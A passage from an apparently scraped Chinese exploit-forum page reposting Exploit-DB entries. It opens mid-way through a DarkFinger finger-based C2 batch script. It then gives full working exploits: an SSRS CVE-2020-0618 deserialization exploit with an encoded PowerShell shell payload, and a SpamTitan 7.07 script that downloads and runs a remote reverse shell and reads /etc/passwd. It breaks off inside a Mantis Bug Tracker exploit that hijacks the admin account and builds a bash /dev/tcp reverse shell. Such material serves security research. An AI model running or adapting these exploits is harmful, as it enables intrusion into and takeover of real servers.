add v4tov4 listenaddress=%LOCAL_IP% listenport=%LOCAL_FINGER_PORT% connectaddress=%DARK_IP% connectport=%DARK_PORT% IF %DARK_PORT%==79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%DARK_PORT% connectaddress=%LOCAL_IP% connectport=%LOCAL_FINGER_PORT% IF NOT %DARK_PORT% == 79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%LOCAL_FINGER_PORT% connectaddress=%DARK_IP% connectport=%DARK_PORT% IF NOT %DARK_PORT% == 79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%DARK_PORT% connectaddress=%LOCAL_IP% connectport=%LOCAL_FINGER_PORT% IF %Admin% == 0 netsh interface portproxy show all GOTO CmdOpt :RemNetShPortProxy IF %Admin% == 1 ( ECHO %FAIL_MSG% @ECHO. GOTO CmdOpt ) ELSE ( ECHO [!] Removing NetSh PortProxy from registry. REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F >nul 2>&1 ) IF %DARK_PORT%==79 ( GOTO CmdOpt ) ELSE ( GOTO Init ) :ShowPortProxy netsh interface portproxy show all GOTO CmdOpt REM Allows agent to change the DarkFinger C2 listener port. :ChgC2ServerPort IF %Admin% == 1 ( ECHO %FAIL_MSG% @ECHO. GOTO CmdOpt ) SET /P TMP_PORT="[+] DarkFinger listener Port: " IF %DARK_PORT%==79 finger !%TMP_PORT%!@%DARK_IP% IF NOT %DARK_PORT%==79 finger !%TMP_PORT%!@%LOCAL_IP% SET DARK_PORT=%TMP_PORT% ECHO [!] Attempted to change the DarkFinger remote Port to %TMP_PORT%. IF NOT %DARK_PORT%==79 ECHO [!] Non default finger port used, must set a new Portproxy. ( GOTO RemNetShPortProxy ) ELSE ( GOTO CmdOpt ) :Close EXIT /B [PoC Video URL] https://www.youtube.com/watch?v=cfbwS6zH7ks [Network Access] Remote [Disclosure Timeline] September 11, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
  8. ISHACK AI BOT

    Microsoft SQL Server Reporting Services 2016 - Remote Code Execution

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Microsoft SQL Server Reporting Services 2016 - Remote Code Execution # Google Dork: inurl:ReportViewer.aspx # Date: 2020-09-17 # Exploit Author: West Shepherd # Vendor Homepage: https://www.microsoft.com # Version: Microsoft SQL Server 2016 32-bit/x64 SP2 (CU/GDR), Microsoft SQL Server 2014 32-bit/x64 SP3 (CU/GDR), Microsoft SQL Server 2012 32-bit/x64 SP2 (QFE) # Tested on: Windows 2016 # CVE : CVE-2020-0618 # Credit goes to Soroush Dalili # Source: # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0618 # https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/ #!/usr/bin/python from requests.packages.urllib3.exceptions import InsecureRequestWarning from requests_ntlm import HttpNtlmAuth import argparse, requests, logging from bs4 import BeautifulSoup from sys import argv, exit, stderr, stdout # to create a payload (default is bindshell on 0.0.0.0:65535): # .\ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command..." class Exploit: payload = '/wEy4hYAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAAqAUvYyBwb3dlcnNoZWxsLmV4ZSAtZXhlYyBieXBhc3MgLW5vbmludGVyYWN0aXZlIC1ub2V4aXQgLXdpbmRvd3N0eWxlIGhpZGRlbiAtYyBpZXgoW3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6ZGVmYXVsdC5nZXRzdHJpbmcoW3N5c3RlbS5jb252ZXJ0XTo6ZnJvbWJhc2U2NHN0cmluZygnSkdFOVczTjVjM1JsYlM1dVpYUXVjMjlqYTJWMGN5NTBZM0JzYVhOMFpXNWxjbDAyTlRVek5Uc2tZUzV6ZEdGeWRDZ3BPeVJqUFNSaExtRmpZMlZ3ZEhSamNHTnNhV1Z1ZENncE95UmxQU1JqTG1kbGRITjBjbVZoYlNncE8xdGllWFJsVzExZEpHYzlNQzR1TmpVMU16VjhKWHN3ZlR0M2FHbHNaU2dvSkdnOUpHVXVjbVZoWkNna1p5d3dMQ1JuTG14bGJtZDBhQ2twTFc1bElEQXBleVJzUFNodVpYY3RiMkpxWldOMElDMTBlWEJsYm1GdFpTQnplWE4wWlcwdWRHVjRkQzVoYzJOcGFXVnVZMjlrYVc1bktTNW5aWFJ6ZEhKcGJtY29KR2NzTUN3a2FDazdKRzQ5S0dsbGVDQWtiQ0F5UGlZeGZHOTFkQzF6ZEhKcGJtY3BPeVJ3UFNJa0tDUnVLU1FvS0hCM1pDa3VjR0YwYUNrK0lqc2tjVDBvVzNSbGVIUXVaVzVqYjJScGJtZGRPanBoYzJOcGFTa3VaMlYwWW5sMFpYTW9KSEFwT3lSbExuZHlhWFJsS0NSeExEQXNKSEV1YkdWdVozUm9LVHNrWlM1bWJIVnphQ2dwZlRza1l5NWpiRzl6WlNncE95UmhMbk4wYjNBb0tUc05DZz09JykpKQYHAAAAA2NtZAQFAAAAIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAACERlbGVnYXRlB21ldGhvZDAHbWV0aG9kMQMDAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJCAAAAAkJAAAACQoAAAAECAAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYLAAAAsAJTeXN0ZW0uRnVuY2AzW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBgwAAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CgYNAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkGDgAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcwYPAAAABVN0YXJ0CRAAAAAECQAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpTaWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5UeXBlW10JDwAAAAkNAAAACQ4AAAAGFAAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYVAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBCgAAAAkAAAAGFgAAAAdDb21wYXJlCQwAAAAGGAAAAA1TeXN0ZW0uU3RyaW5nBhkAAAArSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYaAAAAMlN5c3RlbS5JbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBEAAAAAgAAAAGGwAAAHFTeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQkMAAAACgkMAAAACRgAAAAJFgAAAAoL' timeout = 0.5 cookies = {} params = {} def __init__(self, opt): requests.packages.urllib3.disable_warnings(InsecureRequestWarning) self.username = '%s\\%s' % (opt.domain, opt.username) self.target = '%s%s' % (opt.target, opt.path) self.password = opt.password self.session = requests.session() self.redirect = opt.redirect self.proxies = { 'http': 'http://%s' % opt.proxy, 'https': 'http://%s' % opt.proxy } if opt.proxy != '' else {} self.headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)', 'Content-Type': 'application/x-www-form-urlencoded' } self.form = { '__VIEWSTATE': '', 'NavigationCorrector$PageState': 'NeedsCorrection', 'NavigationCorrector$ViewState': self.payload } if opt.debug: self.debug() def info(self, message): stdout.write('[+] %s\n' % str(message)) return self def error(self, message): stderr.write('[-] error: %s\n' % str(message)) return self def doGet(self, url, params=None, values=None): self.info('sending get request to %s' % url) try: return self.session.get( url=url, verify=False, allow_redirects=self.redirect, headers=self.headers, cookies=self.cookies, proxies=self.proxies, data=values, params=params, auth=HttpNtlmAuth(self.username, self.password) ) if self.username != '\\' else self.session.get( url=url, verify=False, allow_redirects=self.redirect, headers=self.headers, cookies=self.cookies, proxies=self.proxies, data=values, params=params ) except Exception as err: self.error(err) def doPost(self, url, values=None, params=None): self.info('sending post request to %s' % url) try: return self.session.post( url=url, data=values, verify=False, allow_redirects=self.redirect, headers=self.headers, cookies=self.cookies, proxies=self.proxies, params=params, auth=HttpNtlmAuth(self.username, self.password) ) if self.username != '\\' else self.session.post( url=url, data=values, verify=False, allow_redirects=self.redirect, headers=self.headers, cookies=self.cookies, proxies=self.proxies, params=params ) except Exception as err: self.error(err) def parsePage(self, content): self.info('parsing form values') soup = BeautifulSoup(content, 'lxml') for tag in soup.select('input'): try: self.form[tag['name']] = tag['value'] except Exception as err: self.error(err) return self def debug(self): self.info('debugging enabled') try: import http.client as http_client except ImportError: import httplib as http_client http_client.HTTPConnection.debuglevel = 1 logging.basicConfig() logging.getLogger().setLevel(logging.DEBUG) requests_log = logging.getLogger("requests.packages.urllib3") requests_log.setLevel(logging.DEBUG) requests_log.propagate = True return self def getForm(self): self.info('retrieving form values') resp = self.doGet(url=self.target) self.parsePage(content=resp.content) return self def exploit(self): self.info('exploiting target') resp = self.doPost(url=self.target, params=self.params, values=self.form) self.info('received response %d' % resp.status_code) return self if __name__ == '__main__': parser = argparse.ArgumentParser( description='CVE-2020-0618 SQL Server Reporting Services ViewState Deserialization exploit', add_help=True ) try: parser.add_argument('-target', action='store', help='Target address: http(s)://target.com ') parser.add_argument('-username', action='store', default='', help='Username to use: first.last') parser.add_argument('-domain', action='store', default='', help='User domain to use: domain.local') parser.add_argument('-password', action='store', default='', help='Password to use: Summer2020') parser.add_argument('-debug', action='store', default=False, help='Enable debugging: False') parser.add_argument('-redirect', action='store', default=False, help='Follow redirects: False') parser.add_argument('-proxy', action='store', default='', help='Enable proxy: 10.10.10.10:8080') parser.add_argument('-path', action='store', default='/ReportServer/pages/ReportViewer.aspx', help='Path to page') if len(argv) == 1: parser.print_help() exit(1) options = parser.parse_args() Exploit(opt=options).exploit() except Exception as error: stderr.write('[-] error in main %s\n' % str(error)) Regards, West Shepherd OSWE | OSCE | OSCP | OSWP | CEH | Security+ West Lee Shepherd, LLC
  9. ISHACK AI BOT

    SpamTitan 7.07 - Remote Code Execution (Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: SpamTitan 7.07 - Remote Code Execution (Authenticated) # Date: 2020-09-18 # Exploit Author: Felipe Molina (@felmoltor) # Vendor Homepage: https://www.titanhq.com/spamtitan/spamtitangateway/ # Software Link: https://www.titanhq.com/signup/?product_type=spamtitangateway # Version: 7.07 # Tested on: FreeBSD # CVE : CVE-2020-11699, CVE-2020-11700, CVE-2020-11803, CVE-2020-11804 ---[SPUK-2020-09/SpamTitan 7.07 Multiple Authenticated Remote Code Execution]------------------------------ SECURITY ADVISORY: SPUK-2020-09/SpamTitan 7.07 Multiple Authenticated Remote Code Execution Affected Software: SpamTitan Gateway 7.07 (possibly earlier versions) Vulnerability: Multiple Authenticated Remote Code Execution CVSSv3: 8.7 (https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N) Severity: High Release Date: 2020-09-18 CVEs: CVE-2020-11699, CVE-2020-11700, CVE-2020-11803, CVE-2020-11804 I. Background ~~~~~~~~~~~~~ From www.spamtitan.com: "SpamTitan Gateway is a powerful Anti-Spam appliance that equips network administrators with extensive tools to control mail flow and protect against unwanted email and malware." II. Description ~~~~~~~~~~~~~~~ Multiple authenticated remote code execution (RCE) vulnerabilities were found on the SpamTitan Gateway 7.07 and probably in pervious versions: * CVE-2020-11699: Improper validation of the parameter fname on the page certs-x.php would allow an attacker to execute remote code on the target server. The user has to be authenticated before interacting with this page. * CVE-2020-11700: Improper sanitization of the parameter fname, used on the page certs-x.php, would allow an attacker to retrieve the contents of arbitrary files. The user has to be authenticated before interacting with this page. * CVE-2020-11803: Improper sanitization of the parameter jaction when interacting with the page mailqueue.php could lead to PHP code evaluation server-side, because the user-provided input is passed directly to the php eval() function. The user has to be authenticated on the web platform before interacting with the page. * CVE-2020-11804: Due to improper sanitization of the parameter qid, used in the page mailqueue.php, code injection can occur. The input for this parameter is provided directly by an authenticated user via an HTTP GET request. III. PoC ~~~~~~~~ Use python 3 and install the following modules before executing: requests. If your IP is 192.168.1.5 and the target SpamTitan server is spamtitan.example.com, call the PoC like this: ./multirce.py -t spamtitan.example.com -i 192.168.1.5 -m <EXPLOIT NUMBER> -u <USER> -p <PASSWORD> -U http://192.168.1.5/rev.py --------------------------------------------- #!/usr/bin/env python # Author: Felipe Molina (@felmoltor) # Date: 09/04/2020 # Python Version: 3.7 # Summary: This is PoC for multiple authenticated RCE and Arbitrary File Read # 0days on SpamTitan 7.07 and previous versions. # Product URL: https://www.spamtitan.com/ # Product Version: 7.07 and probably previous import requests from requests import Timeout requests.packages.urllib3.disable_warnings() import os import threading from optparse import OptionParser import socket import json import re from urllib.parse import urlparse from time import sleep from base64 import b64decode,b64encode def myip(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: # doesn't even have to be reachable s.connect(('10.255.255.255', 1)) IP = s.getsockname()[0] except: IP = '127.0.0.1' finally: s.close() return IP def shellServer(ip,port,quiet): servers = socket.socket(socket.AF_INET, socket.SOCK_STREAM) servers.bind((ip, port)) servers.listen(1) info("Waiting for incoming connection on %s:%s" % (ip,port)) conn, addr = servers.accept() conn.settimeout(1) success("Hurray, we got a connection from %s" % addr[0]) prompt =conn.recv(128) prompt=str(prompt.decode("utf-8")).strip() command = input(prompt) while True: try: c = "%s\n" % (command) if (len(c)>0): conn.sendall(c.encode("utf-8")) # Quit the console if command == 'exit': info("\nClosing connection") conn.close() break else: completeanswer="" while True: answer=None try: answer=str((conn.recv(1024)).decode("utf-8")) completeanswer+=answer except socket.timeout: completeanswer.strip() break print(completeanswer,end='') command = input("") except (KeyboardInterrupt, EOFError): info("\nClosing connection") break # This is an authenticated remote code execution in "certs-x.php". E.g: def CVE_2020_11699(cookies, target, shellurl): # Giving time to the maim thread to open the reverse shell listener sleep(5) oscmd="/usr/local/bin/wget %s -O /tmp/r.py;/usr/local/bin/python /tmp/r.py" % (shellurl) t1 = "%s/certs.php" % target t2 = "%s/certs-x.php" % target # get the csrf token value res1 = requests.get(t1,cookies=cookies,verify=False) m = re.search("var csrf_token_postdata =.*CSRFName=(.*)&CSRFToken=(.*)\";",res1.text) if (m is not None): csrfguard=m.group(1) csrftoken=m.group(2) data = { "CSRFName":csrfguard, "CSRFToken":csrftoken, "jaction":"deletecert", "fname":"dummy || $(%s)" % oscmd } info("Triggering the reverse shell in the target.") try: res2 = requests.post(t2,data=data,cookies=cookies,verify=False) print(res2.text) except Timeout: info("Request timed-out. You should have received already your reverse shell.") else: fail("CSRF tokens were not found. POST will fail.") # This is an arbitrary file read on "certs-x.php" def CVE_2020_11700(cookies,target,file): fullpath="../../../..%s" % file t1 = "%s/certs.php" % target t2 = "%s/certs-x.php" % target # get the csrf token value res1 = requests.get(t1,cookies=cookies,verify=False) m = re.search("var csrf_token_postdata =.*CSRFName=(.*)&CSRFToken=(.*)\";",res1.text) if (m is not None): csrfguard=m.group(1) csrftoken=m.group(2) data = { "CSRFName":csrfguard, "CSRFToken":csrftoken, "jaction":"downloadkey", "fname":fullpath, "commonname":"", "organization":"", "organizationunit":"", "city":"", "state":"", "country":"", "csrout":"", "pkout":"", "importcert":"", "importkey":"", "importchain":"" } res2 = requests.post(t2,data=data,cookies=cookies,verify=False) if (res2.status_code == 200): success("Contents of the file %s" % file) print(res2.text) else: fail("Error obtaining the CSRF guard tokens from the page.") return False # This is an authenticated RCE abusing PHP eval function in mailqueue.php def CVE_2020_11803(cookies, target, shellurl): # Giving time to the maim thread to open the reverse shell listener sleep(5) oscmd="/usr/local/bin/wget %s -O /tmp/r.py;/usr/local/bin/python /tmp/r.py" % (shellurl) b64=(b64encode(oscmd.encode("utf-8"))).decode("utf-8") payload="gotopage+a+\";$b=\"%s\";shell_exec(base64_decode(urldecode($b)));die();$b=\"" % (b64) t1 = "%s/certs.php" % target t2 = "%s/mailqueue.php" % target # get the csrf token value res1 = requests.get(t1,cookies=cookies,verify=False) m = re.search("var csrf_token_postdata =.*CSRFName=(.*)&CSRFToken=(.*)\";",res1.text) if (m is not None): csrfguard=m.group(1) csrftoken=m.group(2) data = { "CSRFName":csrfguard, "CSRFToken":csrftoken, "jaction":payload, "activepage":"incoming", "incoming_count":"0", "active_count":"0", "deferred_count":"0", "hold_count":"0", "corrupt_count":"0", "incoming_page":"1", "active_page":"1", "deferred_page":"1", "hold_page":"1", "corrupt_page":"1", "incomingrfilter":None, "incomingfilter":None, "incoming_option":"hold", "activerfilter":None, "activefilter":None, "active_option":"hold", "deferredrfilter":None, "deferredfilter":None, "deferred_option":"hold", "holdrfilter":None, "holdfilter":None, "hold_option":"release", "corruptrfilter":None, "corruptfilter":None, "corrupt_option":"delete" } # We have to pass a string instead of a dict if we don't want the requests library to convert it to # an urlencoded data and break our payload datastr="" cont=0 for k,v in data.items(): datastr+="%s=%s" % (k,v) cont+=1 if (cont<len(data)): datastr+="&" headers={ "User-Agent":"Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Content-Type": "application/x-www-form-urlencoded" } try: res2 = requests.post(t2,data=datastr,cookies=cookies,headers=headers,verify=False,proxies=proxies) except Timeout: info("Request timed-out. You should have received already your reverse shell.") else: fail("CSRF tokens were not found. POST will fail.") # This is an authenticated RCE abusing qid GET parameter in mailqueue.php def CVE_2020_11804(cookies, target, shellurl): # Giving time to the maim thread to open the reverse shell listener sleep(5) oscmd="/usr/local/bin/wget %s -O /tmp/r.py;/usr/local/bin/python /tmp/r.py" % (shellurl) payload="1;`%s`" % oscmd t = "%s/mailqueue.php?qid=%s" % (target,payload) info("Triggering the reverse shell in the target.") try: res2 = requests.get(t,cookies=cookies,verify=False) except Timeout: info("Request timed-out. You should have received already your reverse shell.") # Authenticate to the web platform and get the cookies def authenticate(target,user,password): loginurl="%s/login.php" % target data={ "jaction":"none", "language":"en_US", "address":"%s" % user, "passwd":"%s" % password } res = requests.post(loginurl, data=data,allow_redirects = False,verify=False) if (res.status_code == 302 and len(res.cookies.items())>0): return res.cookies else: return None def printmsg(msg,quiet=False,msgtype="i"): if (not quiet): if (success): print("[%s] %s" % (msgtype,msg)) else: print("[-] %s" % msg) def info(msg,quiet=False): printmsg(msg,quiet,msgtype="i") def success(msg,quiet=False): printmsg(msg,quiet,msgtype="+") def fail(msg,quiet=False): printmsg(msg,quiet,msgtype="-") def parseoptions(): parser = OptionParser() parser.add_option("-t", "--target", dest="target", help="Target SpamTitan URL to attack. E.g.: https://spamtitan.com/", default=None) parser.add_option("-m", "--method", dest="method", help="Exploit number: (1) CVE-2020-11699 [RCE], (2) CVE-2020-XXXX [RCE], (3) CVE-2020-XXXX2 [RCE], (4) CVE-2020-11700 [File Read]", default=1) parser.add_option("-u", "--user", dest="user", help="Username to authenticate with. Default: admin", default="admin") parser.add_option("-p", "--password", dest="password", help="Password to authenticate with. Default: hiadmin", default="hiadmin") parser.add_option("-I", "--ip", dest="ip", help="Local IP where to listen for the reverse shell. Default: %s" % myip(), default=myip()) parser.add_option("-P", "--port", dest="port", help="Local Port where to listen for the reverse shell. Default: 4242", default=4242) parser.add_option("-U", "--URL", dest="shellurl", help="HTTP URL path where the reverse shell is located. Default: http://%s/rev.py" % myip(), default="http://%s/rev.py" % myip()) parser.add_option("-f", "--filetoread", dest="filtetoread", help="Full path of the file to read from the remote server when executing CVE-2020-11700. Default: /etc/passwd", default="/etc/passwd") parser.add_option("-q", "--quiet", action="store_true", dest="quiet", default=False, help="Shut up script! Just give me the shell.") return parser.parse_args() def main(): (options,arguments) = parseoptions() quiet = options.quiet target = options.target ip = options.ip port = options.port user = options.user password = options.password shellurl = options.shellurl method = int(options.method) rfile = options.filtetoread # Sanitize options if (target is None): fail("Error. Specify a target (-t).") exit(1) else: if (not target.startswith("http://") and not target.startswith("https://")): target = "http://%s" % target if (method < 1 or method > 4): fail("Error. Specify a method from 1 to 4:\n (1) CVE-2020-11699 [RCE]\n (2) CVE-2020-XXXX [RCE]\n (3) CVE-2020-XXXX2 [RCE]\n (4) CVE-2020-11700 [File Read]") exit(1) # Before doing anything, login cookies = authenticate(target,user,password) if (cookies is not None): success("User logged in successfully.") if (method == 1): info("Exploiting CVE-2020-11699 to get a reverse shell on %s:%s" % (ip,port),quiet) rev_thread = threading.Thread(target=CVE_2020_11699, args=(cookies,target,shellurl)) rev_thread.start() # Open the reverse shell listener in this main thread info("Spawning a reverse shell listener. Wait for it...") shellServer(options.ip,int(options.port),options.quiet) elif (method == 2): info("Exploiting CVE-2020-11803 to get a reverse shell on %s:%s" % (ip,port),quiet) rev_thread = threading.Thread(target=CVE_2020_11803, args=(cookies,target,shellurl)) rev_thread.start() # Open the reverse shell listener in this main thread info("Spawning a reverse shell listener. Wait for it...") shellServer(options.ip,int(options.port),options.quiet) elif (method == 3): info("Exploiting CVE-2020-11804 to get a reverse shell on %s:%s" % (ip,port),quiet) rev_thread = threading.Thread(target=CVE_2020_11804, args=(cookies,target,shellurl)) rev_thread.start() # Open the reverse shell listener in this main thread info("Spawning a reverse shell listener. Wait for it...") shellServer(options.ip,int(options.port),options.quiet) elif (method == 4): info("Reading file '%s' by abusing CVE-2020-11700." % rfile, quiet) CVE_2020_11700(cookies,target,rfile) else: fail("Error authenticating. Are you providing valid credentials?") exit(2) exit(0) main() --------------------------------------------- III. Impact ~~~~~~~~~~~ Loss of confidentiality, integrity and availability of several files in the target server, as well as loss of availability of several services running in the SpamTitan. Confidentiality of critical system files, such as /etc/passwd or /etc/pwd.db would be highly impacted. IV. Disclosure ~~~~~~~~~~~~~~ Reported By: Felipe Molina de la Torre Vendor Informed: 2020-04-17 Patch Release Date: 2019-05-26 Advisory Release Date: 2019-09-18 V. References ~~~~~~~~~~~~~ * https://sensepost.com/blog/2020/clash-of-the-spamtitan/ * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11699 * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11700 * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11803 * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11804 ---------------------------------[SPUK-2020-09/SpamTitan 7.07 Multiple Authenticated Remote Code Execution]---
  10. ISHACK AI BOT

    Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated) # Date: 2020-09-17 # Vulnerability Discovery: hyp3rlinx, permanull # Exploit Author: Nikolas Geiselman # Vendor Homepage: https://mantisbt.org/ # Software Link: https://mantisbt.org/download.php # Version: 1.3.0/2.3.0 # Tested on: Ubuntu 16.04/19.10/20.04 # CVE : CVE-2017-7615, CVE-2019-15715 # References: # https://mantisbt.org/bugs/view.php?id=26091 # https://www.exploit-db.com/exploits/41890 ''' This exploit chains together two CVE's to achieve unauthenticated remote code execution. The first portion of this exploit resets the Administrator password (CVE-2017-7615) discovered by John Page a.k.a hyp3rlinx, this portion was modified from the original https://www.exploit-db.com/exploits/41890. The second portion of this exploit takes advantage of a command injection vulnerability (CVE-2019-15715) discovered by 'permanull' (see references). Usage: Set netcat listener on port 4444 Send exploit with "python exploit.py" Example output: kali@kali:~/Desktop$ python exploit.py Successfully hijacked account! Successfully logged in! Triggering reverse shell Cleaning up Deleting the dot_tool config. Deleting the relationship_graph_enable config. Successfully cleaned up kali@kali:~/Desktop$ nc -nvlp 4444 listening on [any] 4444 ... connect to [192.168.116.135] from (UNKNOWN) [192.168.116.151] 43978 bash: cannot set terminal process group (835): Inappropriate ioctl for device bash: no job control in this shell www-data@ubuntu:/var/www/html/mantisbt-2.3.0$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) ''' import requests from urllib import quote_plus from base64 import b64encode from re import split class exploit(): def __init__(self): self.s = requests.Session() self.headers = dict() # Initialize the headers dictionary self.RHOST = "192.168.116.151" # Victim IP self.RPORT = "80" # Victim port self.LHOST = "192.168.116.135" # Attacker IP self.LPORT = "4444" # Attacker Port self.verify_user_id = "1" # User id for the target account self.realname = "administrator" # Username to hijack self.passwd = "password" # New password after account hijack self.mantisLoc = "/mantisbt-2.3.0" # Location of mantis in URL self.ReverseShell = "echo " + b64encode("bash -i >& /dev/tcp/" + self.LHOST + "/" + self.LPORT + " 0>&1") + " | base64 -d | /bin/bash" # Reverse shell payload def reset_login(self): # Request # 1: Grab the account update token url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/verify.php?id=' + self.verify_user_id + '&confirm_hash=' r = self.s.get(url=url,headers=self.headers) if r.status_code == 404: print "ERROR: Unable to access password reset page" exit() account_update_token = r.text.split('name="account_update_token" value=')[1].split('"')[1] # Request # 2: Reset the account password url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/account_update.php' data = "account_update_token=" + account_update_token + "&password=" + self.passwd + "&verify_user_id=" + self.verify_user_id + "&realname=" + self.realname + "&password_confirm=" + self.passwd self.headers.update({'Content-Type':'application/x-www-form-urlencoded'}) r = self.s.post(url=url, 